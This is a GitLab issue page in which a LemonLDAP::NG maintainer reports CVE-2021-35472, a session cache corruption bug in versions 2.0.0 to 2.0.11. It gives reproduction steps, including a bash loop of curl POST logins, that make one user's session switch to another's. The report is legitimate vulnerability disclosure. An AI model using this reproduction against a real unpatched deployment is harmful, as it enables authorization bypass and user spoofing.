Skip to content
GitLab
Projects Groups Snippets
  • /
  • Help
    • Help
    • Support
    • Community forum
    • Submit feedback
    • Contribute to GitLab
  • Sign in
  • lemonldap-ng lemonldap-ng
  • Project information
    • Project information
    • Activity
    • Labels
    • Members
  • Repository
    • Repository
    • Files
    • Commits
    • Branches
    • Tags
    • Contributors
    • Graph
    • Compare
  • Issues 317
    • Issues 317
    • List
    • Boards
    • Service Desk
    • Milestones
  • Merge requests 9
    • Merge requests 9
  • CI/CD
    • CI/CD
    • Pipelines
    • Jobs
    • Schedules
  • Deployments
    • Deployments
    • Environments
    • Releases
  • Packages and registries
    • Packages and registries
    • Container Registry
  • Monitor
    • Monitor
    • Incidents
  • Analytics
    • Analytics
    • Value stream
    • CI/CD
    • Repository
  • Snippets
    • Snippets
  • Activity
  • Graph
  • Create a new issue
  • Jobs
  • Commits
  • Issue Boards
Collapse sidebar
  • LemonLDAP NGLemonLDAP NG
  • lemonldap-nglemonldap-ng
  • Issues
  • #2539
Closed
Open
Issue created Jun 08, 2021 by Christophe Maudoux@maudouxMaintainer

[security:high, CVE-2021-35472] session cache corruption can lead to authorization bypass or spoofing

Concerned version

Version: %2.0.0 to %2.0.11

Platform: Nginx/uWSGI

Summary

  • Enable Impersonation plugin

  • Enable REST Session server

  • Disable CSRF tokens

  • Start a terminal and execute : for i in {1..1000}; do curl -X POST -H 'Accept:application/json' -d user=msmith --data-urlencode password='msmith' http://auth.example.com:19876;done

  • make reload

  • Login dwho/dwho/dwho and hit F5 to refresh Portal

  • Alternatively authenticated as 'dwho' or 'msmith'

Backends used

PGvokoscreen-2021-06-08_22-12-00

Possible fixes

Seems issue is linked to handler internal cache.

Login with 'dwho' / 'dwho'

Enable Impersonation plugin -> make reload_web_server

Start bash loop, hit F5 and session switches to 'msmith'

Stop bash loop and session is back to 'dwho' after 10/15 seconds..;

Edited Jun 25, 2021 by Yadd
Assignee
Assign to
Time tracking